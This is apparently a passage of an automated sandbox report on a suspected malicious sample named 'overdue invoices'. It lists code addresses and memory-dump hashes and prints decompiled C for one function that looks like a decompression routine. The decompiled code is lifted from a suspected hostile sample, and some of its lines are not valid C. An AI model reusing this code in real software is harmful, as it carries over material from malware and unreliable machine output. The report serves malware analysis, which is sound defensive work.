                  0x00406340
                  0x00000000
                  0x004062f1
                  0x004062f7
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x004066bb
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00406709
                  0x0040670d
                  0x004068bc
                  0x004068d2
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x004068ee
                  0x00406719
                  0x00406720
                  0x00406728
                  0x0040672b
                  0x0040672e
                  0x0040672e
                  0x00406734
                  0x00406734
                  0x00405ed0
                  0x00405ed0
                  0x00405ed0
                  0x00405ed9
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x00000000
                  0x00405eea
                  0x00000000
                  0x00000000
                  0x00405ef3
                  0x00405ef6
                  0x00405ef9
                  0x00405efd
                  0x00000000
                  0x00000000
                  0x00405f03
                  0x00405f06
                  0x00405f08
                  0x00405f09
                  0x00405f0c
                  0x00405f0e
                  0x00405f0f
                  0x00405f11
                  0x00405f14
                  0x00405f19
                  0x00405f1e
                  0x00405f27
                  0x00405f3a
                  0x00405f3d
                  0x00405f49
                  0x00405f71
                  0x00405f73
                  0x00405f81
                  0x00405f81
                  0x00405f85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00405f75
                  0x00405f75
                  0x00405f78
                  0x00405f79
                  0x00405f79
                  0x00000000
                  0x00405f75
                  0x00405f4f
                  0x00405f54
                  0x00405f54
                  0x00405f5d
                  0x00405f65
                  0x00405f68
                  0x00000000
                  0x00405f6e
                  0x00405f6e
                  0x00000000
                  0x00405f6e
                  0x00000000
                  0x00405f8b
                  0x00405f8b
                  0x00405f8f
                  0x0040683b
                  0x00000000
                  0x0040683b
                  0x00405f98
                  0x00405fa8
                  0x00405fab
                  0x00405fae
                  0x00405fae
                  0x00405fae
                  0x00405fb1
                  0x00405fb5
                  0x00000000
                  0x00000000
                  0x00405fb7
                  0x00405fbd
                  0x00405fe7
                  0x00405fed
                  0x00405ff4
                  0x00000000
                  0x00405ff4
                  0x00405fc3
                  0x00405fc6
                  0x00405fcb
                  0x00405fcb
                  0x00405fd6
                  0x00405fde
                  0x00405fe1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406026
                  0x0040602c
                  0x0040602f
                  0x0040603c
                  0x00406044
                  0x00000000
                  0x00000000
                  0x00405ffb
                  0x00405ffb
                  0x00405fff
                  0x0040684a
                  0x00000000
                  0x0040684a
                  0x0040600b
                  0x00406016
                  0x00406016
                  0x00406016
                  0x00406019
                  0x0040601c
                  0x0040601f
                  0x00406024
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x00000000
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004066bb
                  0x004066b8
                  0x00000000
                  0x004062ef

                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                  • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                  • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                  • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406409 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
